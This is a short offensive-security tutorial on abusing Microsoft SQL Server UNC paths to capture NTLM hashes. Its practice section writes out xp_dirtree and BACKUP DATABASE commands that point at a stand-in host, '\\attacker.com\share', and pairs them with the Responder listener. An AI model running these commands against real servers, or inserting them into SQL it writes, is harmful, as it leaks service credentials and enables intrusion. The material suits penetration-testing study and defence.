MSSQL UNC Path

Context

This article aims to provide insights into exploiting MSSQL UNC Path vulnerabilities for network exfiltration and NTLM hash capturing. This technique involves leveraging SQL injection on Microsoft SQL Server to trick the server into accessing remote resources via UNC paths, thus capturing authentication hashes. Readers should already understand UNC paths, NTLM authentication, network file sharing, and have experience with SQL injection in Microsoft SQL Server.

Theory

UNC Path Exploitation in MSSQL

Universal Naming Convention (UNC) paths are a way to identify resources on a network, such as files and directories. When SQL Server accesses these paths, it may inadvertently leak NTLM hashes, which could be exploited by attackers to capture credentials. This vulnerability arises because MSSQL can be directed to interact with resources over a network by leveraging these paths.

Using xp_dirtree and xp_fileexist

xp_dirtree and xp_fileexist are extended stored procedures in MSSQL. xp_dirtree lists directories, and xp_fileexist checks for file existence. Both can be manipulated to access a UNC path. An attacker can exploit these procedures to invoke remote paths, triggering MSSQL to send NTLM authentication details to the specified location.

Backup and Restore Methods

The BACKUP and RESTORE commands in MSSQL allow database backups to be written to or restored from a specified location. By directing these operations to a network location using a UNC path, attackers can encourage MSSQL to authenticate, thereby capturing authentication details in the process.

Hash Leakage Techniques

NTLM hashes are used in Windows environments as part of authentication processes. When MSSQL accesses a network resource via a UNC path, it attempts to authenticate using these NTLM hashes. An attacker can set up a malicious SMB server to intercept these authentication requests and capture the transmitted hashes.

NTLM Capture Mechanisms

NTLM authentication can be intercepted by setting up listeners that capture attempted connections. By directing MSSQL to a known monitoring platform configured for such interceptions, attackers can capture these hashes and use them for unauthorized access to the network.

Network Exfiltration Strategies

Data exfiltration is the unauthorized transfer of data from a network. Utilizing UNC paths, attackers can direct MSSQL to access and authenticate against an external server, enabling data and credentials to be leaked over SMB.

Practice

Exploiting xp_dirtree for UNC Path Access

  • Execute the following command to trigger MSSQL to access the UNC path:

    EXEC xp_dirtree '\\attacker.com\share';

    This command directs the MSSQL server to list directories on the specified UNC path, initiating an authentication attempt.

  • Set up Responder to capture NTLM hashes:

    Responder is a tool that listens for authentication requests over the network and captures any NTLM hashes that are transmitted.

Using BACKUP Command for UNC Path Exploitation

  • Force MSSQL to authenticate to the UNC path using the BACKUP command:

    BACKUP DATABASE test TO DISK = '\\attacker.com\share\backup.bak';

    The BACKUP command specifies a network location to store the backup, prompting the server to authenticate.

  • Monitor with Responder for NTLM hash capture:

    Ensure Responder is active on the network to catch any outgoing authentication attempts and capture the NTLM hashes.

Tools

  • Responder

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.